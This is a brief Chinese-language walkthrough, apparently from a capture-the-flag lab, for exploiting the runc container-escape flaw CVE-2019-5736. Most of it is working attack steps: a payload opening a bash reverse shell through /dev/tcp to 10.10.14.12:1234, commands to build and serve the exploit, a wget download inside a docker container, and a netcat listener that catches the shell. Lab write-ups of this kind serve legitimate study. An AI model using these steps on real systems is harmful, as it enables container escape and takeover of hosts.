🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
该机器存在CVE-2019-5736漏洞,请按照Runc漏洞利用(CVE-2019-5736)中的步骤操作。 下载main.go文件,将文件中的payload修改为:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
之后,运行:
go build main.go
搭建一个HTTP服务器:
python3 -m http.server

然后按如下方式打开3个终端:

终端1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
终端2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
终端3
nc -nlvp 1234
一旦你在第一个SSH终端中运行了./main,立即在第二个SSH终端中运行第二个命令,然后你将在终端3中获得netcat反弹shell。

